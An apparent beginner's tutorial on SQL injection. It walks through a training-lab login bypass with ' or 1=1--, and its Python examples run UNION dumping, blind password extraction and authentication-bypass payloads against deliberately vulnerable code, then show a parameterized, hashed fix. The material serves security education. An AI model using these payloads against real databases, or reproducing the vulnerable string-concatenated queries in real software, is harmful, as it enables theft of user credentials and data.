FORnSEC Solutions

Beginner’s Guide To SQL Injection


If you are starting your journey in web application or Android penetration testing, SQL injection is one of the first vulnerability classes to learn: Injection is in the OWASP Top 10, and a single flaw of this kind often exposes the whole database. Before looking at the attack itself, a short refresher on SQL.

Let us begin!

What is SQL?

SQL stands for Structured Query Language. It is the language used to define, store, manipulate and retrieve the data held in a relational database.

When you fill in a form on a website, the details you enter are written to a backend database configured by the developers. The application manages that database with SQL statements such as CREATE, ALTER, INSERT, UPDATE, DELETE and SELECT.

What is SQL Injection?

An SQL injection attack inserts (injects) SQL syntax through an application's input fields so that the attacker's input becomes part of the query the application sends to its database. In short, it makes the application hand over data the attacker wants.

It usually lets the attacker read data they should not be able to retrieve; in many cases they can also alter or delete data, changing the contents of the database.

In some cases SQL injection can even be used to execute commands on the operating system of the database server, potentially letting an attacker pivot to other systems behind the network perimeter.

Types of SQL Injection :

  • In-band (classic) SQLi: the extracted data comes back in the same channel as the request (error-based and UNION-based).
  • Out-of-band SQLi: the data leaves through a separate channel, such as a DNS or HTTP request made by the database server.
  • Blind (inferential) SQLi: no data comes back directly; it is inferred from true/false differences or time delays in the response.

SQL Injection Exploitation Technique :

  • Error Based SQLi

Add a single quote character ' to the parameter and look for database error messages or other anomalies in the response.

  • Union Based SQLi

Append a UNION SELECT clause with the same number of columns as the original query (found by stepping ORDER BY n, or by adding NULL columns until the error disappears) so that rows from another table are returned inside the application's normal response.

  • Boolean Based SQLi

Add SQL syntax that evaluates to the parameter's original value in one request and to a different (false) value in another, and look for systematic differences in the application's responses.

  • Time Based SQLi

Add payloads designed to trigger a time delay when executed within the SQL query (for example a database sleep function) and look for differences in response time.

  • Out of Band SQLi

Add OAST payloads designed to trigger an out-of-band network interaction (such as a DNS lookup) when executed within the SQL query, and monitor a server you control for the resulting interactions.
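The UNION-based and blind (boolean-based) techniques listed above, as an added worked example that is not part of the original article: a constructed shop database with a deliberately vulnerable search_products() endpoint, run offline against SQLite. The table names, rows and stored password are invented for the illustration, and the payloads use SQLite spellings (substr, unicode, the -- comment); MySQL, PostgreSQL and MSSQL spell these differently.

```python
"""In-band (UNION) and blind (boolean) extraction against one vulnerable search endpoint.

Added example, not the article's code. Everything below (tables, rows, the
search endpoint and the secret) is constructed so the techniques run offline.
"""
import sqlite3

# Constructed sample database standing in for the application's backend.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
    INSERT INTO products(name, price) VALUES ('Laptop', 999.0), ('Mouse', 19.5);
    CREATE TABLE users(id INTEGER PRIMARY KEY, email TEXT, password TEXT);
    INSERT INTO users(email, password) VALUES ('admin@email.com', 'Pa55word');
""")


def search_products(term: str):
    """Hypothetical vulnerable search endpoint: the term is concatenated into the query.
    Returns the rows as the page would render them, or [] on a SQL error. The error
    text itself is hidden, so only the presence/content of rows leaks to the attacker."""
    query = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    try:
        return conn.execute(query).fetchall()
    except sqlite3.Error:
        return []


def find_column_count(max_cols: int = 10) -> int:
    """UNION needs the same number of columns as the original SELECT.
    ORDER BY n fails once n exceeds the column count, so the last n that
    still returns rows is the count (LIKE '%' matches every product)."""
    count = 0
    for n in range(1, max_cols + 1):
        if search_products(f"' ORDER BY {n} --"):
            count = n
        else:
            break
    return count


def dump_users_via_union() -> list:
    """In-band: append a UNION SELECT with a matching column count; the secrets
    come back in the same response as the (empty) product listing."""
    cols = find_column_count()
    if cols < 2:
        return []
    extra = ", NULL" * (cols - 2)  # pad if the original SELECT has more than 2 columns
    rows = search_products(f"zzz-no-such-product' UNION SELECT email, password{extra} FROM users --")
    return [(email, password) for email, password, *_ in rows]


def blind_extract_password(email: str, max_len: int = 32) -> str:
    """Blind: nothing is returned directly. Each request asks one yes/no question
    and the answer is read from whether the product list is empty. A binary
    search over printable ASCII costs about seven requests per character."""
    base = "Laptop"  # a term that normally matches, so the injected AND decides the outcome
    sub = f"(SELECT password FROM users WHERE email = '{email}')"
    recovered = ""
    for pos in range(1, max_len + 1):
        if not search_products(f"{base}%' AND length({sub}) >= {pos} --"):
            break  # past the end of the value
        lo, hi = 32, 126  # invariant: the true code point lies within [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if search_products(f"{base}%' AND unicode(substr({sub}, {pos}, 1)) > {mid} --"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    print("columns:", find_column_count())
    print("union dump:", dump_users_via_union())
    print("blind dump:", blind_extract_password("admin@email.com"))
```

The UNION path needs a single request once the column count is known; the blind path needs roughly seven requests per character, which is why boolean- and time-based extraction is far noisier in logs and much slower than in-band extraction.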

Try to identify the parameters in the application that interact with the database:

  • Authentication page (username and password fields)
  • Search field
  • POST body fields
  • GET (query string) parameters
  • HTTP headers (for example User-Agent, Referer, X-Forwarded-For)
  • Cookies

Example: error-based SQLi

First, open the lab site: https://www.hacksplaining.com/exercises/sql-injection#/start

The vulnerable bank application login page will open.

Enter a username and password and check whether any errors appear in the log panel:

Username = user@email.com

Password = password 

The log shows that the user "user@email.com" exists in the database but the password is invalid.

Now try injecting into the password parameter by appending a single quote: password'

The added quote produces an error in the log:

An error occurred: PG::SyntaxError: ERROR: unterminated quoted string at or near "'password'' limit 1" LINE 1: ...ers where email = 'user@email.com' and password = 'password'... ^ : select * from users where email = 'user@email.com' and password = 'password'' limit 1

Unable to log in to this user due to an unexpected error.

This error shows that our input is concatenated straight into the SQL text (the stray quote changed the query's structure), so the application is vulnerable to SQL injection.

Now submit the payload ' or 1=1-- as the password.

Normally the query checks the database for a row whose email and password both match what was entered. Our input closes the password string early with the quote, adds OR 1=1, a condition that is true for every row, and the -- turns the rest of the original query (the closing quote and the LIMIT 1) into a comment. Because AND binds tighter than OR, the WHERE clause becomes (email matches AND password = '') OR 1=1, which is true for every row in the users table:

SELECT * FROM users WHERE email = 'user@email.com' AND password = '' OR 1=1 --' limit 1

The database executes this query and returns the matching rows, and the application logs us in as the first user returned.
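The walkthrough above, reproduced as an added example against an in-memory SQLite database (this is not the lab's or the article's code; the table, the two accounts and the login() function are constructed here). SQLite's error text differs from the PostgreSQL message shown above, but the three outcomes are the same: wrong password is denied, a stray quote raises a database error, and ' or 1=1-- bypasses the check. The last call, which picks a specific account by commenting out the password check from the email field, goes slightly beyond the lab's payload.

```python
"""Vulnerable login built by string concatenation, as in the lab walkthrough.

Added example, not the lab's code: table, accounts and login() are constructed.
"""
import sqlite3

# Constructed sample users table standing in for the bank application's database.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
conn.executemany(
    "INSERT INTO users(email, password) VALUES (?, ?)",
    [("user@email.com", "Tr0ub4dor&3"), ("admin@email.com", "hunter2")],
)
conn.commit()


def login(email: str, password: str):
    """Vulnerable login: the inputs are spliced into the SQL text, exactly the
    pattern visible in the PostgreSQL error above. Returns (outcome, detail)
    where outcome is 'ok', 'denied' or 'error'; the error text is what leaks."""
    query = (
        f"SELECT id, email FROM users WHERE email = '{email}' "
        f"AND password = '{password}' LIMIT 1"
    )
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as exc:
        # A quote in the input broke the query: this is the error-based signal.
        return "error", f"{type(exc).__name__}: {exc}"
    if row is None:
        return "denied", None
    return "ok", row[1]  # logged in as whichever row came back first


if __name__ == "__main__":
    # Step 1: a wrong password is simply denied.
    print(login("user@email.com", "password"))
    # Step 2: the appended quote leaves an unterminated string -> database error.
    print(login("user@email.com", "password'"))
    # Step 3: '' OR 1=1 is true for every row and -- comments out "' LIMIT 1".
    print(login("user@email.com", "' or 1=1--"))
    # Beyond the lab: comment out the password check from the email field to pick an account.
    print(login("admin@email.com' --", "anything"))
```

Without the trailing comment the payload would leave a dangling quote and LIMIT 1 after the injected condition and fail with a syntax error, which is why the -- (or #, or a matching quote) is part of almost every authentication-bypass payload.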

Basic SQL statements:-

  • SELECT :-  Read data from the database based on search criteria.
  • INSERT :-  Insert new rows into a table.
  • UPDATE :-  Update existing rows based on given criteria.
  • DELETE :-  Delete existing rows based on given criteria.
  • ORDER BY :-  Sort the result set in ascending or descending order.
  • LIMIT :-  Restrict the number of rows returned (useful for reading one row at a time during exploitation).

How to Prevent SQL Injection:-

  • Validate user input :-

The first step in preventing SQL injection attacks is validating user input. For each parameter, establish an allowlist of what it may contain (expected type, length and character set, or a fixed set of permitted values such as the column names accepted by an ORDER BY) and reject everything else before it reaches the query. This is input validation; it narrows the attack surface but is not sufficient on its own.

  • Sanitize data and stop concatenating strings into queries :-

Attackers rely on special character sequences (quotes, comment markers, semicolons) to change the structure of a query, and escaping them by hand is fragile and easy to get wrong. The dependable fix is to never build a query by string concatenation: use parameterized queries (prepared statements) or an ORM that binds values separately from the SQL text, so that a quote in the input is treated as data rather than syntax.

  • Actively manage patches and updates :-

Vulnerabilities in applications and databases that are exploitable through SQL injection are regularly discovered and publicly disclosed. Keep all web application components up to date, including the database server software, frameworks, libraries, plug-ins and web server software.

  • Use a virtual or physical firewall :-

A software or appliance-based web application firewall (WAF) helps filter out known malicious payloads. Treat it as a compensating control: attackers routinely bypass WAF signatures, so it does not replace fixing the code.

  • Apply encryption and hashing :-

Assume an internet-connected application will eventually be breached. Encrypt confidential data at rest and in transit, store passwords only as salted hashes produced by a slow algorithm (bcrypt, scrypt, Argon2 or PBKDF2), and keep connection strings and credentials out of source code, so that a successful injection yields as little usable data as possible.
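A hardened version of the login from the lab example, added here to show the two prevention points about avoiding string concatenation and about hashing passwords together (this is example code, not the article's or the lab's; the table, the accounts, the email allowlist pattern and the PBKDF2 work factor are assumptions for the illustration). The same payloads that broke or bypassed the vulnerable login are now either rejected by validation or simply treated as a wrong password.

```python
"""Hardened login: parameterized SQL, input allowlist, salted PBKDF2 password hashes.

Added example, not the lab's code. The driver sends the SQL text and the bound
values separately, so a quote in the input can never change the query's structure.
"""
import hashlib
import hmac
import os
import re
import sqlite3

# Conservative allowlist for the email parameter. Validation is a second layer,
# not the fix: the parameterized query below is safe even if this pattern is loose.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
PBKDF2_ROUNDS = 100_000  # illustrative work factor; tune for the hardware you deploy on


def hash_password(password: str, salt: bytes = b"") -> str:
    """Return 'salt$hash' in hex; a fresh 16-byte random salt is drawn unless one is supplied."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


# Constructed sample accounts; only hashes are stored, never the clear-text passwords.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, email TEXT UNIQUE, password_hash TEXT)")
conn.executemany(
    "INSERT INTO users(email, password_hash) VALUES (?, ?)",
    [("user@email.com", hash_password("Tr0ub4dor&3")), ("admin@email.com", hash_password("hunter2"))],
)
conn.commit()


def safe_login(email: str, password: str) -> str:
    """Returns 'ok', 'denied' or 'rejected' (input failed validation).
    No code path splices the inputs into SQL text, so no payload alters the query."""
    if not EMAIL_RE.fullmatch(email) or len(password) > 256:
        return "rejected"
    # '?' placeholders: the query's structure is fixed and the value is bound by the driver.
    row = conn.execute(
        "SELECT email, password_hash FROM users WHERE email = ? LIMIT 1", (email,)
    ).fetchone()
    # Same answer for an unknown user and a wrong password, so the login does not
    # reveal which accounts exist (the lab's log did exactly that).
    if row is None or not verify_password(password, row[1]):
        return "denied"
    return "ok"


if __name__ == "__main__":
    print(safe_login("user@email.com", "Tr0ub4dor&3"))   # ok
    print(safe_login("user@email.com", "password'"))     # denied, no database error
    print(safe_login("user@email.com", "' or 1=1--"))    # denied, the payload is just a wrong password
    print(safe_login("admin@email.com' --", "anything")) # rejected by the email allowlist
```

Note that the password is never part of the SQL at all: the query fetches the stored hash for the email and the comparison happens in application code, which is both injection-proof and keeps the comparison constant-time.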